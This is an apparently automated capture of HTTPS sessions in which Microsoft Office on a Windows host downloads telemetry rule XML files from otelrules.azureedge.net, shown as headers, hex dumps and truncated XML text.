                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:59 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE8C605FF"
                                                                                                                                                                                                                                                                                        x-ms-request-id: e1eaf116-901e-005b-52d5-332005000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153712Z-174f7845968psccphC1EWRuz9s000000058000000000qpm2
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703501" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSa


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        122192.168.2.44987813.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule703500v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:43 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDF497570"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 072c0cc7-901e-00ac-57d5-33b69e000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f784596886s2bhC1EWR743w000000056g00000000a3mz
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 33 35 30 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 53 61 6e 64 62 6f 78 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 53 61 6e 64 62 6f 78 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="703500" V="0" DC="SM" EN="Office.Telemetry.Event.Office.Sandbox" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenSandbox" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        123192.168.2.44987913.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:12 UTC192OUTGET /rules/rule701801v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:12 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:38 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BDC2EEE03"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 9a2bee4b-a01e-0053-62d5-338603000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153712Z-174f7845968nxc96hC1EWRspw800000004ug00000000h3bg
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701801" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        124192.168.2.44988013.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC192OUTGET /rules/rule701051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:47 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE1CC18CD"
                                                                                                                                                                                                                                                                                        x-ms-request-id: bd8c52a0-d01e-0014-7ad5-33ed58000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f7845968cpnpfhC1EWR3afc00000004ng00000000sefw
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRe


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        125192.168.2.44988113.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC192OUTGET /rules/rule701800v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:01 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEA414B16"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 54bb2358-d01e-0066-7cd5-33ea17000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f7845968c2t8dhC1EWR8s2000000004v000000000g39x
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 38 30 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 73 6f 75 72 63 65 73 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 73 6f 75 72 63 65 73 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701800" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Resources" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenResources" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        126192.168.2.44988213.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC192OUTGET /rules/rule701050v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1362
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB256F43"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 7cd1200c-e01e-0052-1ad5-33d9df000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f784596886s2bhC1EWR743w000000052g00000000r7c5
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1362INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 30 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 52 65 6c 65 61 73 65 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 52 65 6c 65 61 73 65 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701050" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Release" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenRelease" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        127192.168.2.44988313.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC192OUTGET /rules/rule702751v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1403
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:03 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BEB866CDB"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1958b31d-101e-0046-24d5-3391b0000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f7845968psccphC1EWRuz9s00000005f0000000002syg
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1403INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702751" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantToken


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        128192.168.2.44988413.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC192OUTGET /rules/rule702750v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1366
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:27:54 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE5B7B174"
                                                                                                                                                                                                                                                                                        x-ms-request-id: c8cfe486-b01e-0053-1fd5-33cdf8000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f7845968vwdr7hC1EWRsh3w000000051g00000000ggdw
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1366INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 37 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 75 62 6c 69 73 68 65 72 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 75 62 6c 69 73 68 65 72 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702750" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Publisher" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPublisher" S="Medium" /> <F T="2


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        129192.168.2.44988513.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC192OUTGET /rules/rule702301v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                        Connection: Keep-Alive
                                                                                                                                                                                                                                                                                        Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                        User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                        Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                        Date: Mon, 11 Nov 2024 15:37:13 GMT
                                                                                                                                                                                                                                                                                        Content-Type: text/xml
                                                                                                                                                                                                                                                                                        Content-Length: 1399
                                                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                        Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                        Last-Modified: Tue, 09 Apr 2024 00:28:00 GMT
                                                                                                                                                                                                                                                                                        ETag: "0x8DC582BE976026E"
                                                                                                                                                                                                                                                                                        x-ms-request-id: 1973c9cd-501e-0047-1dd5-33ce6c000000
                                                                                                                                                                                                                                                                                        x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                        x-azure-ref: 20241111T153713Z-174f7845968jrjrxhC1EWRmmrs000000057g00000000gnwd
                                                                                                                                                                                                                                                                                        x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                        X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                        2024-11-11 15:37:13 UTC1399INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 32 33 30 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 50 72 6f 6a 65 63 74 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 50 72
                                                                                                                                                                                                                                                                                        Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="702301" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Project.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenPr


                                                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                        130192.168.2.44988613.107.246.45443
                                                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
